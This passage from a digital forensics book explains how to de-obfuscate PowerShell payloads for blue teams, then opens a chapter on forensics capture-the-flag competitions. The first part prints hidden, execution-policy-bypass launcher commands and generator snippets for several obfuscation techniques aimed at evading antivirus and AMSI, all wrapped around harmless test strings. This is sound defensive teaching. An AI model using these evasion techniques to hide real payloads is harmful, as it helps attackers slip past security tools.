This success resonates with proof of concept exploit code for major vulnerabilities such as what
we saw with PrintNightmare / CVE-2021-34527 (https://github.com/nemo-wq/PrintNightmare-CVE-
2021-34527).
One of the hurdles people will find when they use PowerShell for these types of activities is that the
code will ultimately be accessible in plain text. While this is helpful for security researchers to learn
from others and their published exploit code, it’s equally as helpful for security providers to reverse
engineer and signature these payloads to prevent them from doing harm.
For blue teamers, this is a good thing, however for penetration testers, as well as cyber criminals,
this will directly impact their success. In an effort to obstruct the progress of security providers
from being able to easily signature their payloads, they will introduce various levels of obfuscation
to help hide their code in plain sight. While this helps the red teamers, it unfortunately makes our
job as blue teamers a bit more difficult. However, with a little bit of exposure to common obfuscation
techniques and how they work, you will find that deobfuscating them is well within your grasp.
Through this chapter, I am looking to expose you to the following obfuscation techniques and how
you can de-obfuscate them.
1. Base64 Encoded Commands
2. Base64 Inline Expressions
3. GZip Compression
4. Invoke Operator
5. String Reversing
6. Replace Chaining
7. ASCII Translation
Chapter 5 - De-Obfuscating PowerShell Payloads 117
Stigma of Obfuscation
While Obfuscation in essence is a puzzle of sorts and with every puzzle, all you need is time. It’s
important to understand that obfuscation is not be-all and end-all solution to preventing payloads
from being signatured. If you continue to use the same obfuscated payload or obfuscation technique,
it will eventually get busted.
This reality can cause debates in the security community on it’s overall effectiveness, but it’s
important for us to understand that obfuscation serves two purposes for red teams:
Bypass various signature based detections from anti-virus solutions as well as AMSI;
To buy time in the event the payload is successful, but later discovered by a blue team.
The process of bypassing security solutions is a trivial process, but where the gap typically exists is
with the second bullet when we are responding to incidents involving these payloads.
Let’s put this into perspective with a commonly experienced scenario:
Assume we are a penetration tester and we are performing an assessment against an organization.
We managed to obtain a list of valid email addresses and decided to try to launch a phishing
campaign. With this phishing campaign, we emailed the staff a word document that contains a
macro that launches a remote hosted PowerShell script that contains a reverse shell and neither the
document or script is flagged by any known anti-virus.
At some point the user reports the email and we launch our phishing assessment procedures and
identify that the user did in fact open the email and got pwned.
From the firewall logs we are able to see where they connected to and were able to plug the hole.
Continuing our incident response procedures, we follow up on the embedded payload to ensure that
it doesn’t include another logic that does anything else that we don’t already know about, such as
mechanisms where it has a more than one remote address it can reach out to in the event one gets
discovered.
As the penetration tester, we coded contingencies for this very scenario so that our payload does
in fact use more than one remote address. To ensure our extra effort doesn’t get steam rolled, we
obfuscated our payload so the blue team would have to spend extra time lifting the veil, buying us
more time to hopefully move laterally through the network, away from the point of entry.
This is the barrier that must be able to be avoided within a reasonable amount of time so that we can
ensure that the threat we have evicted from our network stays evicted. As a blue teamer, if you’re
exposed to a complicated or unfamiliar obfuscation technique, then chances are you may move onto
something else or spend too much time trying to uncover its secrets.
To help overcome this obstacle, we will step through various obfuscation techniques, including how
they’re generated and how you can deobfuscate them.
Chapter 5 - De-Obfuscating PowerShell Payloads 118
Word of Caution
It goes without saying that when dealing with PowerShell payloads that are malicious or otherwise
suspicious then you should avoid trying to dissect these payloads on your production machine. No
one wants to be responsible for a breach or get compromised themselves because they accidentally
executed a piece of code that they did not understand.
A good practice is to always have a sandbox solution on standby. You can use a local sandbox, such
as a virtual machine, that has no connected network adapters, or at least configured on an entirely
separate internet connection that contains no sensitive assets on the network.
In addition to this, being sure you have enough storage for snapshots is very useful. This way if you
accidentally compromise your sandbox, or want to get it back to a known-working state, then you
can simply revert it and continue where you left off.
Chapter 5 - De-Obfuscating PowerShell Payloads 119
Base64 Encoded Commands
One of the first methods to obfuscate PowerShell payloads utilized a provided feature of the
powershell.exe executable itself. Specifically, this executable supports the -EncodedCommand
parameter that accepts a base64 encoded string. Once called, PowerShell would decode the string
and execute the code therein.
While this is trivial to decode, it was a method that was enhanced with additional optional
parameters.
These optional parameters can also be called using partial names so long as it’s unambiguous, which
is a common practice with this particular launcher. This is arguably the most popular approach and
is also one of the easiest to discover when reviewing the logs.
Let’s take a look at the following payload of this technique and break it down.
1 powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc 'VwByAGkAdABlAC0ATwB1AHQAcAB1A
2 HQAIAAiAE8AYgBmAHUAcwBjAGEAdABlAGQAIABQAGEAeQBsAG8AYQBkACIA'
At a quick glance we can clearly see that powershell.exe is being called directly with 5 parameters
being passed using partial names. We can look at the help file for this by running powershell -help.
Let’s break down these parameters:
Partial Parameter Full Parameter Description
-NoP -NoProfile Does not load the Windows
PowerShell profile.
-NonI -NonInteractive Does not present an interactive
prompt to the user.
-W Hidden -WindowStyle Sets the window style to Normal,
Minimized, Maximized or Hidden.
-Exec Bypass -ExecutionPolicy Bypass Sets the default execution policy for
the current session.
-Enc -EncodedCommand Accepts a base-64-encoded string
version of a command.
With our newfound understanding of the parameters in play, we now break down exactly what’s
happening when this gets called, specifically, this session will launch unrestricted as a hidden
window.
Now that we understand the behavior of the PowerShell process when executed, our next step is to
identify the encoded payload that’s being executed behind the scenes. Decoding base64 is a trivial
process, but we can accomplish this by using PowerShell to decode the string for this.
Chapter 5 - De-Obfuscating PowerShell Payloads 120
Keep in mind that running this method will not execute any underlying code by itself.
1 PS C:> $Bytes = [Convert]::FromBase64String('VwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAiAE
2 8AYgBmAHUAcwBjAGEAdABlAGQAIABQAGEAeQBsAG8AYQBkACIA')
3 PS C:> $Command = [System.Text.Encoding]::Unicode.GetString($Bytes)
4 PS C:> Write-Output "[*] Decoded Command >> $Command"
5 [*] Decoded Command >> Write-Output "Obfuscated Payload"
Running this method has revealed a simple payload, which was expected based on the size of the
base 64 encoded string. If it was significantly larger, we could safely assume that that payload would
be larger.
You can replicate this obfuscation technique for decoding practice using this snippet to encode a
simple one-liner, or even expand to more complex scripts.
1 PS C:> $Command = 'Write-Output "Obfuscated Payload"'
2 PS C:> $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Command)
3 PS C:> $Base64 = [Convert]::ToBase64String($Bytes)
4 PS C:> Write-Output "[*] Obfuscated: powershell.exe -NoP -NonI -W Hidden -Exec Bypa
5 ss -Enc '$Base64'"
6 [*] Obfuscated: powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc 'VwByAGkAdABlA
7 C0ATwB1AHQAcAB1AHQAIAAiAE8AYgBmAHUAcwBjAGEAdABlAGQAIABQAGEAeQBsAG8AYQBkACIA'
Chapter 5 - De-Obfuscating PowerShell Payloads 121
Base64 Inline Expressions
This method is very similar to the technique that we saw previously, except instead of passing base64
encoded strings to the powershell.exe executable, we can embed base64 encoded strings directly into
our scripts themselves. Let’s see an example of this in action.
1 PS C:> iex ([System.Text.Encoding]::Unicode.GetString(([convert]::FromBase64String(
2 'VwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAiAE8AYgBmAHUAcwBjAGEAdABlAGQAIABQAGEAeQBsAG8AYQB
3 kACIA'))))
The majority of most obfuscation techniques for PowerShell payloads are simply just different string
manipulation techniques. In the scheme of things, strings on their own are not a risk or executable
on their own, but rely on a launcher to take the string and treat it as executable code.
In the above sample, let’s observe the three letter command, namely iex, which is an alias for the
Invoke-Expression cmdlet. The Invoke-Expression cmdlet accepts a string which is then executed as
a command.
To put this into perspective, we will create a variable called $String that will store the value
Get-Service’. If we pass this variable to Invoke-Expression, we will see a list of
services output to the console as if we simply ran Get-Service‘.
1 PS C:> $String = 'Get-Service'
2 PS C:> Invoke-Expression $String
3
4 Status Name DisplayName
5 ------ ---- -----------
6 Stopped AarSvc_b0e91cc Agent Activation Runtime_b0e91cc
7 Stopped AJRouter AllJoyn Router Service
8 Stopped ALG Application Layer Gateway Service
9 …SNIP…
Returning to our obfuscated sample, we know that the payload is essentially built into two
components:
1. The launcher (iex)
2. The base64 decoder (string / command)
Chapter 5 - De-Obfuscating PowerShell Payloads 122
Once the base64 decoder runs, it will return a string. By passing this as an argument to iex, it will
essentially execute the resulting string from the base64 decoder. We can omit the iex, and simply
execute the decoder to reveal the underlying string.
1 PS C:> ([System.Text.Encoding]::Unicode.GetString(([convert]::FromBase64String('VwB
2 yAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAiAE8AYgBmAHUAcwBjAGEAdABlAGQAIABQAGEAeQBsAG8AYQBkACI
3 A'))))
4 Write-Output "Obfuscated Payload"
This has revealed our obfuscated payload as Write-Output "Obfuscated Payload". If we were to
include iex, our resulting string would be executed
1 PS C:> iex ([System.Text.Encoding]::Unicode.GetString(([convert]::FromBase64String(
2 'VwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAiAE8AYgBmAHUAcwBjAGEAdABlAGQAIABQAGEAeQBsAG8AYQB
3 kACIA'))))
4 Obfuscated Payload
You are going to find that in most of the obfuscated scripts you’ll come across, you’ll be met with
Invoke-Expression, its alias or an obfuscated representation of either. Remember, a plain string
cannot be executed without a launcher.
You can replicate this obfuscation technique for decoding practice using this snippet to encode a
simple one-liner, or even expand to more complex scripts.
1 PS C:> $Command = 'Write-Output "Obfuscated Payload"'
2 PS C:> $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Command)
3 PS C:> $Base64 = [Convert]::ToBase64String($Bytes)
4 PS C:> iex ([System.Text.Encoding]::Unicode.GetString(([convert]::FromBase64String(
5 'VwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAiAE8AYgBmAHUAcwBjAGEAdABlAGQAIABQAGEAeQBsAG8AYQB
6 kACIA'))))
Chapter 5 - De-Obfuscating PowerShell Payloads 123
GZip Compression
A relatively successful obfuscation technique is built around compressing byte streams. Similar to
how we can compress files on disk to make them smaller, we can also compress payloads and store
and execute them from within a script.
This technique was quite successful once it started being utilized because of its relative difficulty of
breaking down the underlying code to reveal the intended payload. Let’s see an example of this.
1 $PS C:> $decoded = [System.Convert]::FromBase64String("H4sIAAAAAAAEAAsvyixJ1fUvLSko
2 LVFQ8k9KKy1OTixJTVEISKzMyU9MUQIA9Wd9xiEAAAA=");$ms = (New-Object System.IO.MemoryStr
3 eam($decoded,0,$decoded.Length));iex(New-Object System.IO.StreamReader(New-Object Sy
4 stem.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompr
5 ess))).ReadToEnd()
Depending on your familiarity with .NET classes, there are some unfamiliar or potentially intimidat-
ing components displayed in this code example. Additionally, we see a slightly ambiguous technique
where a multiline payload is converted into an effective one-liner denoted by the use of semicolons
;.
Let’s try to make this code a little easier to read by entering new lines where we see semicolons.
1 PS C:> $decoded = [System.Convert]::FromBase64String("H4sIAAAAAAAEAAsvyixJ1fUvLSkoL
2 VFQ8k9KKy1OTixJTVEISKzMyU9MUQIA9Wd9xiEAAAA=")
3 PS C:> $ms = (New-Object System.IO.MemoryStream($decoded,0,$decoded.Length))
4 PS C:> iex(New-Object System.IO.StreamReader(New-Object System.IO.Compression.GZipS
5 tream($ms, [System.IO.Compression.CompressionMode]::Decompress))).readtoend()
Great, this is now a bit easier for us to read. If this is our first time seeing this, we’d likely think the
easy win is with looking at the decoded base64 string that’s stored in the first variable, let’s try it.
1 PS C:> [System.Convert]::FromBase64String("H4sIAAAAAAAEAAsvyixJ1fUvLSkoLVFQ8k9KKy1O
2 TixJTVEISKzMyU9MUQIA9Wd9xiEAAAA=")
3 31
4 139
5 8
6 0
7 …SNIP…
This revealed a byte array. Even if we converted the byte array to a string by using
System.Text.Encoding]::ASCII.GetString(), it would still leave us just as confused. One of
the benefits of this technique is that some security providers decode these strings automatically,
but in this case, it wouldn’t necessarily reveal anything immediately signaturable on its own.
Chapter 5 - De-Obfuscating PowerShell Payloads 124
1 PS C:> [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("
2 H4sIAAAAAAAEAAsvyixJ1fUvLSkoLVFQ8k9KKy1OTixJTVEISKzMyU9MUQIA9Wd9xiEAAAA="))
3 ?
4 /?,I??/-)(-QP?OJ+-NN,IMQH???OLQ ?g}?!
Let’s keep looking at the payload. If you remember from before, when we see iex, or invoke-
expression, then it’s executing a resulting string.
With this in mind, look at how iex is followed by a grouping operator () which contains a set of
expressions. This tells us that iex ultimately executes the resulting code from the inner expressions.
If we simply remove iex, and execute the remaining code, we’ll see the resulting code that is being
executed.
1 PS C:> $decoded = [System.Convert]::FromBase64String("H4sIAAAAAAAEAAsvyixJ1fUvLSkoL
2 VFQ8k9KKy1OTixJTVEISKzMyU9MUQIA9Wd9xiEAAAA=")
3 PS C:> $ms = (New-Object System.IO.MemoryStream($decoded,0,$decoded.Length))
4 PS C:> (New-Object System.IO.StreamReader(New-Object System.IO.Compression.GZipStre
5 am($ms, [System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()
6
7 Write-Output "Obfuscated Payload"
Fantastic, by ultimately making a readability adjustment followed by removing an iex command,
we have torn down a seemingly complicated payload and revealed our obfuscated payload.
You can replicate this obfuscation technique for decoding practice using this snippet to encode a
simple one-liner, or even expand to more complex scripts.
1 # Generator
2 $command = 'Write-Output "Try Harder"'
3
4 ## ByteArray
5 $byteArray = [System.Text.Encoding]::ASCII.GetBytes($command)
6
7 ## GzipStream
8 [System.IO.Stream]$memoryStream = New-Object System.IO.MemoryStream
9 [System.IO.Stream]$gzipStream = New-Object System.IO.Compression.GzipStream $memoryS
10 tream, ([System.IO.Compression.CompressionMode]::Compress)
11 $gzipStream.Write($ByteArray, 0, $ByteArray.Length)
12 $gzipStream.Close()
13 $memoryStream.Close()
14 [byte[]]$gzipStream = $memoryStream.ToArray()
15
16 ## Stream Encoder
Chapter 5 - De-Obfuscating PowerShell Payloads 125
17 $encodedGzipStream = [System.Convert]::ToBase64String($gzipStream)
18
19 ## Decoder Encoder
20 [System.String]$Decoder = '$decoded = [System.Convert]::FromBase64String("<Base64>")
21 ;$ms = (New-Object System.IO.MemoryStream($decoded,0,$decoded.Length));iex(New-Objec
22 t System.IO.StreamReader(New-Object System.IO.Compression.GZipStream($ms, [System.IO
23 .Compression.CompressionMode]::Decompress))).readtoend()'
24 [System.String]$Decoder = $Decoder -replace "<Base64>", $encodedGzipStream
25
26 # Launcher
27 $decoded = [System.Convert]::FromBase64String("H4sIAAAAAAAEAAsvyixJ1fUvLSkoLVFQCimqV
28 PBILEpJLVICAGWcSyMZAAAA")
29 $ms = (New-Object System.IO.MemoryStream($decoded,0,$decoded.Length))
30 Invoke-Expression (New-Object System.IO.StreamReader(New-Object System.IO.Compressio
31 n.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()
Chapter 5 - De-Obfuscating PowerShell Payloads 126
Invoke Operator
At this point we have found that a common pitfall in obfuscating PowerShell commands is the
glaringly obvious usage of the Invoke-Expression cmdlet. This is to be expected because its
commonly known purpose is to run supplied expressions. However, this isn’t the only way to directly
execute strings.
PowerShell supports the usage of what’s called the Invoke Operator, which is seen as & within the
scripting language. The behavior of this operator is similar to that of Invoke-Express where it will
execute a given string.
There is something special about this operator where it has an edge on Invoke-Expression, which
is that you can chain call operators in the pipeline. For example, the following three commands are
all valid and will return the same thing:
1 PS C:> Get-Service | Where-Object {$_.Status -eq 'Running'}
2 PS C:> Invoke-Expression 'Get-Service' | Where-Object {$_.Status -eq 'Running'}
3 PS C:> & 'Get-Service' | & 'Where-Object' {$_.Status -eq 'Running'
Its inclusion in a complex payload can be a little tricky though as it isn’t compatible when used with
commands that include parameters. We can put this into perspective with the following example
where the first command is valid and the second will throw an error.
1 PS C:> & 'Get-Service' -Name ALG
2 PS C:> & 'Get-Service -Name ALG'
3 & : The term 'Get-Service -Name ALG' is not recognized as the name of a cmdlet
Because of this behavior, you’re more than likely to see this being used to obfuscate cmdlets
themselves. We can see this in practice by replacing the cmdlets in our compression example from
before.
1 PS C:> $decoded = [System.Convert]::FromBase64String("H4sIAAAAAAAEAAsvyixJ1fUvLSkoL
2 VFQ8k9KKy1OTixJTVEISKzMyU9MUQIA9Wd9xiEAAAA=");$ms = (&'New-Object' System.IO.MemoryS
3 tream($decoded,0,$decoded.Length));&'iex'(&'New-Object' System.IO.StreamReader(&'New
4 -Object' System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMod
5 e]::Decompress))).ReadToEnd()
Chapter 5 - De-Obfuscating PowerShell Payloads 127
String Reversing
One of the benefits of PowerShell is its ability to interact with and manipulate data, including but
not limited to strings. This opens the door to crafting payloads that are confusing to look at, which
can be a very effective stall tactic to slow us down from breaking down their payloads.
One such tactic that can be deployed is string reversing. This is when the characters of a string are
stored in a reverse order, such as the below example.
1 PS C:> $Normal = 'Write-Output "Obfuscated Payload"'
2 PS C:> $Reversed = '"daolyaP detacsufbO" tuptuO-etirW'
When we encounter these scenarios, we can typically re-reverse these strings by hand, or program-
matically.
1 PS C:> $Reversed = '"daolyaP detacsufbO" tuptuO-etirW'
2 PS C:> iex $((($Reversed.length - 1)..0 | ForEach-Object {$Reversed[$_]}) -join '')
3 Obfuscated Payload
These scripts cannot be executed on their own in this format, they have to be placed back in their
intended order. Because of this, you’ll typically see logic in place to reverse the string back to its
intended order. However, if you don’t see that logic, then the string is likely intended to be reversed.
Chapter 5 - De-Obfuscating PowerShell Payloads 128
Replace Chaining
Another method that PowerShell can use to manipulate strings is by replacing strings with other
values, or removing them entirely. This can be used by using the Replace() method from a
System.String object or by using the PowerShell -Replace operator.
1 PS C:> iex('Write-Input "Obfuscated Payload"' -replace "Input","Output")
2 Obfuscated Payload
3
4 PS C:> iex('Write-Input "Obfuscated Payload"'.replace("Input","Output"))
5 Obfuscated Payload
It’s a very common practice for us to see payloads that use string replacements, but keep in mind
that you could see these replace statements chained in ways that will increase its complexity.
1 PS C:> iex $(iex '''Write-Intup "0bfuscated Payload"''.replace("Input","0utput")'.R
2 eplace('tup','put')).replace("'","").replace('0','O')
3 Obfuscated Payload
When dealing with these replace operations, pay very close attention to your integrated development
environment (IDE). You look closely, you’ll see that one of the replace statements is the color of a
string, which means that in that position, it’s indeed a string and not a method invocation. It’s very
common for people to manually do the search and replacements of these, but if you do so out of
order, you could inadvertently break the script logic.
Chapter 5 - De-Obfuscating PowerShell Payloads 129
ASCII Translation
When we view strings we are seeing them in a format that we understand, their character values.
These character values also have binary representation of the character that your computer will
understand. For example, we know that the ASCII value of the character ‘a’ is 97. To the benefit of
some, so does PowerShell out of the box.
We can see this understanding directly from the console through type casting.
1 PS C:> [byte][char]'a'
2 97
3
4 PS C:> [char]97
5 a
What this allows red teamers to do is to add a level of complexity by replacing any arbitrary character
values and convert them into their ASCII derivative. We can see in practice by using our inline base64
expression from before.
1 PS C:> iex ([System.Text.Encoding]::Unicode.GetString(([convert]::FromBase64String(
2 $([char]86+[char]119+[char]66+[char]121+[char]65+[char]71+[char]107+[char]65+[char]1
3 00+[char]65+[char]66+[char]108+[char]65+[char]67+[char]48+[char]65+[char]84+[char]11
4 9+[char]66+[char]49+[char]65+[char]72+[char]81+[char]65+[char]99+[char]65+[char]66+[
5 char]49+[char]65+[char]72+[char]81+[char]65+[char]73+[char]65+[char]65+[char]105+[ch
6 ar]65+[char]69+[char]56+[char]65+[char]89+[char]103+[char]66+[char]109+[char]65+[cha
7 r]72+[char]85+[char]65+[char]99+[char]119+[char]66+[char]106+[char]65+[char]71+[char
8 ]69+[char]65+[char]100+[char]65+[char]66+[char]108+[char]65+[char]71+[char]81+[char]
9 65+[char]73+[char]65+[char]66+[char]81+[char]65+[char]71+[char]69+[char]65+[char]101
10 +[char]81+[char]66+[char]115+[char]65+[char]71+[char]56+[char]65+[char]89+[char]81+[
11 char]66+[char]107+[char]65+[char]67+[char]73+[char]65)))))
12 Obfuscated Payload
When you see these types of payloads, be sure to pay close attention to your IDE. If they are not
color coded to that of a string, then that means that PowerShell will automatically translate them to
their intended value during invocation. You can view their actual value the same way by selecting
them and running the selected code.
Chapter 5 - De-Obfuscating PowerShell Payloads 130
1 PS C:> $([char]86+[char]119+[char]66+[char]121+[char]65+[char]71+[char]107+[char]65
2 +[char]100+[char]65+[char]66+[char]108+[char]65+[char]67+[char]48+[char]65+[char]84+
3 [char]119+[char]66+[char]49+[char]65+[char]72+[char]81+[char]65+[char]99+[char]65+[c
4 har]66+[char]49+[char]65+[char]72+[char]81+[char]65+[char]73+[char]65+[char]65+[char
5 ]105+[char]65+[char]69+[char]56+[char]65+[char]89+[char]103+[char]66+[char]109+[char
6 ]65+[char]72+[char]85+[char]65+[char]99+[char]119+[char]66+[char]106+[char]65+[char]
7 71+[char]69+[char]65+[char]100+[char]65+[char]66+[char]108+[char]65+[char]71+[char]8
8 1+[char]65+[char]73+[char]65+[char]66+[char]81+[char]65+[char]71+[char]69+[char]65+[
9 char]101+[char]81+[char]66+[char]115+[char]65+[char]71+[char]56+[char]65+[char]89+[c
10 har]81+[char]66+[char]107+[char]65+[char]67+[char]73+[char]65)
11 VwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAiAE8AYgBmAHUAcwBjAGEAdABlAGQAIABQAGEAeQBsAG8AYQBk
12 ACIA
These types of techniques can also be mix-matched so you’re using a combination of both characters
and ASCII values within the same string.
1 PS C:> iex "Write-Output $([char]34+[char]79+[char]98+[char]102+[char]117+[char]115
2 +[char]99+[char]97+[char]116+[char]101+[char]100+[char]32+[char]80+[char]97+[char]12
3 1+[char]108+[char]111+[char]97+[char]100+[char]34)"
4 Obfuscated Payload
We can use the following generator as a means to create the above-scenario for practice.
1 $String = 'Write-Output "Obfuscated Payload"'
2 '$(' + (([int[]][char[]]$String | ForEach-Object { "[char]$($_)" }) -join '+') + ')'
Chapter 5 - De-Obfuscating PowerShell Payloads 131
Wrapping Up
In this chapter we walked through different types of PowerShell obfuscation techniques that are
frequently leveraged in the wild and how we can step through them to successfully de-obfuscate
them.
It is important for us to keep in mind that these are not the only tricks that are available in
the obfuscation trade. There are many tricks, both known and unknown to your fellow security
researchers in this field that could be used at any time. With practice and experience, you’ll be able
to de-obfuscate extremely obfuscated reverse shell payloads, such as this:
Chapter 5 - De-Obfuscating PowerShell Payloads 132
One of the best ways to stay ahead of the curve is to ensure that you have a solid understanding of
PowerShell. I would recommend that you take a PowerShell programming course if you’re coming
into this green. If you have some level of comfort with using PowerShell, I challenge you to use
it even more. Find a workflow that’s annoying to do manually and automate it. You can also take
some time and even optimize some of your older scripts.
Never stop challenging yourself. Go the extra mile, stand up and stand strong. Keep moving forward
and you’ll be in a position where you’ll be able to help others grow in the domains that you once
found yourself struggling with.
Tristram
Chapter 6 - Gamification of DFIR:
Playing CTFs
By Kevin Pagano¹⁴¹ | Website¹⁴² | Twitter¹⁴³ | Discord¹⁴⁴
What is a CTF?
The origins of CTF or “Capture The Flag” were found on the playground. It was (still is?) an outdoor
game where teams had to run into the other teams’ zones, physically capture a flag (typically a
handkerchief), and return it back to their own base without getting tagged by the opposing team. In
the information security realm it has come to describe a slightly different competition.
Why am I qualified to talk about CTFs?
Humble brag time. I’ve played in dozens of CTF competitions and have done pretty well for myself.
I am the proud recipient of 3 DFIR Lethal Forensicator coins¹⁴⁵ from SANS, one Tournament of
Champions coin (and trophy!), a 3-time winner of Magnet Forensics CTF competitions, a 4-time
winner of the BloomCON CTF competition, and a few others. I’ve also assisted in the creation of
questions for some CTF competitions as well as creating thorough analysis write-ups of events I’ve
competed in on my personal blog¹⁴⁶.
¹⁴¹https://github.com/stark4n6
¹⁴²https://www.stark4n6.com/
¹⁴³https://twitter.com/KevinPagano3
¹⁴⁴http://discordapp.com/users/597827073846935564
¹⁴⁵https://www.sans.org/digital-forensics-incident-response/coins/
¹⁴⁶https://ctf.stark4n6.com
Chapter 6 - Gamification of DFIR: Playing CTFs 134
Types of CTFs
Two of the most common information security types of CTF competitions are “Jeopardy” style and
“Attack and Defense” style.
“Jeopardy” style typically is a list of questions with varying difficulty and set defined answers. The
player or team is given some sort of file or evidence to analyze and then has to find the flag to the
question and input it in the proper format to get points.
9.1 - Jeopardy style CTF
“Attack and Defense” is more common in Red and Blue Team environments where the Red Team
has to hack or attack a Blue Team server. The Blue Team subsequently has to try to protect themselves
from the attack. Points can be given for time held or for acquiring specific files from the adversary.
9.2 - Attack and Defense CTF
Depending on the CTF, you may see a combination of types, such as “Jeopardy”-style competitions
with linear (story-based) elements that leave some questions hidden or locked until a certain
prerequisite question is answered.
For this chapter, I will go more in-depth regarding the “Jeopardy”-style competitions, more
specifically, forensics-geared CTF competitions.
Chapter 6 - Gamification of DFIR: Playing CTFs 135
Evidence Aplenty
With forensics CTFs, just like in real life, any type of device is game for being analyzed. In the ever-
growing landscape of data locations, there are more and more places to look for clues to solve the
problems. One of the more well known forensic CTFs is the SANS NetWars¹⁴⁷ tournaments. These
are devised with 5 levels with each level being progressively harder than the last. In this competition
you will have a chance to analyze evidence from:
- Windows computer
- macOS computer
- Memory/RAM dump
- iOS dump
- Android dump
- Network (PCAP/Netflow/Snort logs)
- Malware samples
You can see from the above list that you get a well rounded variety of types of evidence that you most
likely will see in the field on the job. In other competitions I’ve played you could also come across
Chromebooks or even Google Takeout and other cloud resources as they become more common. I
have also seen some that are more crypto-based in which you will be working with different ciphers
and hashes to determine the answers.
¹⁴⁷https://www.sans.org/cyber-ranges/
Chapter 6 - Gamification of DFIR: Playing CTFs 136
Who’s Hosting?
As previously mentioned, SANS is probably the most well known provider of a forensics CTF
through their NetWars¹⁴⁸ program. It isn’t cheap as a standalone, but is sometimes bundled with
one of their training courses. You can sometimes see them hosted for free with other events such as
OpenText’s enFuse conference.
As for others, Magnet Forensics has been hosting a CTF for the past 5 years in tandem with their
User Summit. This has been created by Jessica Hyde in collaboration with some students from
Champlain College’s Digital Forensics Association. Some previous Magnet CTFs were also created
by Dave Cowen and Matthew Seyer, for context.
Other software vendors have started to create their own as well to engage with the community.
Cellebrite in the past 2 years has hosted virtual CTF competitions and Belkasoft has created and
put out multiple CTFs¹⁴⁹ the last 2 years. DFRWS¹⁵⁰ hosts a yearly forensic challenge with past
events covering evidence types such as Playstation 3 dumps, IoT (Internet of Things) acquisitions,
mobile malware, and many others.
Another fantastic resource for finding other challenges is CyberDefenders¹⁵¹. They host hundreds
of various different CTF challenges, from past events and other ones that people have uploaded. You
can even contribute your own if you’d like as well as allow them to host your next live event.
9.3 - CyberDefenders website
Another fairly exhaustive list of other past challenges and evidence can be found hosted on
AboutDFIR¹⁵².
¹⁴⁸https://www.sans.org/cyber-ranges
¹⁴⁹https://belkasoft.com/ctf
¹⁵⁰https://dfrws.org/forensic-challenges/
¹⁵¹https://cyberdefenders.org/blueteam-ctf-challenges/
¹⁵²https://aboutdfir.com/education/challenges-ctfs/
Chapter 6 - Gamification of DFIR: Playing CTFs 137
Why Play a CTF?
So at the end of the day, why should YOU (yes, YOU, the reader) play a CTF? Well, it depends on
what you want to get out of it.
For Sport
Growing up I’ve always been a competitive person, especially playing sports like baseball and
basketball, CTFs are no different. There is a rush of excitement (at least for me) competing against
other like-minded practitioners or analysts to see how you stack up. You can even be anonymous
while playing. Part of the fun is coming up with a creative handle or username to compete under. It
also keeps the commentary and your competitors on their toes.
I personally like to problem-solve and to be challenged, which is part of the reason I enjoy playing.
For Profit
I put profit in quotations because many may construe that as a compensation-type objective. While
many CTF challenges do have prizes such as challenge coins or swag (awesome branded clothing
anyone?!), that’s not completely the profit I’m talking about here. The profit is the knowledge you
gain from playing. I’ve done competitions where I never knew how to analyze memory dumps at
all and I learned at least the basics of where to look for evidence and new techniques to try later on
in real world scenarios.
“Commit yourself to lifelong learning. The most valuable asset you’ll
ever have is your mind and what you put into it.” - Albert Einstein
The knowledge you gain from the “practice” will inevitably help you in the future; it’s just a matter
of time. Seriously, you don’t know what you don’t know. Remember when I said you can be
anonymous? It doesn’t matter if you get 10 points or 1000 points, as long as you learn something
new and have fun while doing so, that’s all that matters.
Chapter 6 - Gamification of DFIR: Playing CTFs 138
Toss a Coin in the Tip Jar
I get asked all the time, “what are your keys to success playing CTFs?”. That’s probably a loaded
question, because there are many factors that can lead to good results. Here, I will break it down
into sections that I feel can at least get you started on a path to winning your first CTF.
Tips for Playing - Prior
First and foremost is the preparation phase. Like any task in life, it always helps to be prepared for
the battle ahead. Having a sense of what is to come will help with your plan of attack. Do your
research! If you know that a specific person created the CTF then take a look at their social media
profiles. Oftentimes they will release hints in some form or fashion, whether it is webinars they have
shared or research papers and blog posts they have recently published. Don’t overdo it though, there
could be red herrings amok. You can also look at past CTFs they have created to see how questions
were formulated before and what sort of locations they tend to lean on for flags. This is part of the
reason I personally do write-ups of past CTFs: for future reference.
Each CTF’s rules are different, but sometimes teams are allowed reach out to colleagues or others to
form a squad. Knowledge from multiple people well-versed in different topics can help in spreading
out the workload, especially if there are multiple forms of evidence to be analyzed. I would be remiss
if I didn’t say that some of my winning efforts were with team members who helped pick up sections
where I wasn’t as strong. Your mileage may vary, though. Make sure to coordinate your efforts with
your teammates’ so you do not waste time all working on the same questions.
If evidence is provided ahead of the competition, make sure to spend some time getting familiar with
it. Process the evidence beforehand so you aren’t wasting time during the live competition waiting
on machine time. Some of these events only last 2-3 hours so time is of the essence. This segues right
into building out your analysis machine and your toolkit. Make sure that all your system updates
are completed prior. The last thing you need is an errant Windows update to take down your system
while you watch the spinning.
Chapter 6 - Gamification of DFIR: Playing CTFs 139
9.4 - “This will take a while”
You may also consider making sure you have local admin access or at least the ability to turn
off antivirus (if you are analyzing malware) on your computer. Always do so in a controlled
environment if possible, but you knew this already (I hope). If you are provided a toolkit or a trial of
a commercial license, use it to your advantage, even if it’s a secondary set of tools. There are times
some vendors will make sure that the answer is formulated in a way that their tool will spit out
from their own software. Also, commercial tools can potentially speed up your analysis compared
to a bunch of free tools, but that is personal preference.
Chapter 6 - Gamification of DFIR: Playing CTFs 140
The Toolkit
